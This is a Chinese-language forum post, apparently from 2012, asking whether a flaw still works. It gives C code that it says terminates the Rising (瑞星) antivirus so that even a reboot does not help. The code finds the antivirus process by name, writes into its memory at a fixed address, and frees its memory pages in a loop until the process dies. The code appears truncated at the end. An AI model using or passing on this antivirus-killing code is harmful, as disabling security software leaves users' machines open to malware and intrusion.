|
特邀体验者
- 帖子:4192
- 注册:
2007-11-06
- 来自:
|
发表于:
2012-03-31 13:37
|
只看楼主
短消息
资料
请确认此漏洞还存在吗?
编写成程序后双击运行即可直接K掉瑞星(重起也没用) 以下是漏洞利用代码 ------------------------------------------------------------------------------ DWORD GetProcessIdFromName(LPCTSTR name) { PROCESSENTRY32 pe; DWORD id = 0; HANDLE hSnapsho
编写成程序后双击运行即可直接K掉瑞星(重起也没用)
以下是漏洞利用代码
------------------------------------------------------------------------------
DWORD GetProcessIdFromName(LPCTSTR name)
{
PROCESSENTRY32 pe;
DWORD id = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hSnapshot,&pe) )
return 0;
do
{
pe.dwSize = sizeof(PROCESSENTRY32);
if( Process32Next(hSnapshot,&pe)==FALSE )
break;
if(strcmp(pe.szExeFile,name) == 0)
{
id = pe.th32ProcessID;
break;
}
} while(1);
CloseHandle(hSnapshot);
return id;
}
DWORD GetProcessID(char *FileName)
{
HANDLE myhProcess;
PROCESSENTRY32 mype;
BOOL mybRet;
//进行进程快照
myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //TH32CS_SNAPPROCESS快照所有进程
//开始进程查找
mybRet=Process32First(myhProcess,&mype);
//循环比较,得出ProcessID
while(mybRet)
{
if(strcmp(FileName,mype.szExeFile)==0)
return mype.th32ProcessID;
else
mybRet=Process32Next(myhProcess,&mype);
}
return 0;
}
void killProcess(CString www ,LPCTSTR name,char *xyz)
{
DWORD nPid = 0;
HANDLE hProcess;
DWORD nExitCode = 0;
DWORD nAddress = 0x1000;
nPid=GetProcessIdFromName(name);
hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid);
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
while ( nAddress <= 0x7FFFF000 )
{
GetExitCodeProcess(hProcess, &nExitCode);
if (nExitCode != STILL_ACTIVE)
{
break;
}
WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);
nAddress += 0x1000;
}
用户系统信息:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.802.30 Safari/535.1 SE 2.X MetaSr 1.0
|
